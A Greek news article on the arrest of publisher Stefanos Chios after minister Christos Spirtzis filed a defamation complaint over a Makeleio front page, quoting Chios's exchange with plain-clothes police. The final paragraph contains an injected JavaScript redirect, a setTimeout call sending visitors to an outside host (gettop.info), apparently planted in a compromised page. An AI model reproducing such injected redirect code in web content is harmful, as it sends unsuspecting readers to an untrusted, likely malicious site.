Συνελήφθη ο Στέφανος Χίος έπειτα από μήνυση του Χρ. Σπίρτζη – O διάλογος με τους αστυνομικούς

0
5

 

Έπειτα από μήνυση που κατέθεσε ο υπουργός Υποδομών, Μεταφορών και Δικτύων Χρήστος Σπίρτζης, συνελήφθη ο δημοσιογράφος και εκδότης Στέφανος Χίος.

Ο υπουρφός Υποδομών Μεταφορών και Δικτύων κατέθεσε μήνυση εξαιτίας πρωτοσέλιδου της εφημερίδας του Στέφανου Χίου «Μακελειό» που αφορούσε προσωπική του υπόθεση.

Ο υπουργός, κατέθεσε μήνυση για συκοφαντική δυσφήμηση, το βράδυ της Δευτέρας, εις βάρος του εκδότη, ο οποίος οδηγήθηκε στη ΓΑΔΑ, ενώ το απόγευμα θα απολογηθεί στον Εισαγγελέα.

Σύμφωνα με το makeleio.gr, ο Στέφανος Χίος συνελήφθη έξω από το σπίτι του από άνδρες που φορούσαν πολιτικά ρούχα. Τον πλησίασαν και όταν τους ρώτησε ποιοι είναι, του είπαν από την Κρατική Ασφάλεια. «Ποια ασφάλεια;» Ρώτησε ο δημοσιογράφος. Και του απάντησαν «από την προστασία υπηρεσίας του πολιτεύματος».

«Είστε δηλαδή ΣΥΡΙΖΟφρουροί», είπε ο δημοσιογράφος και συνέχισε λέγοντας: «Πείτε στα αφεντικά της εξουσίας ότι δεν τους φοβάμαι και δεν λυγίζω». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here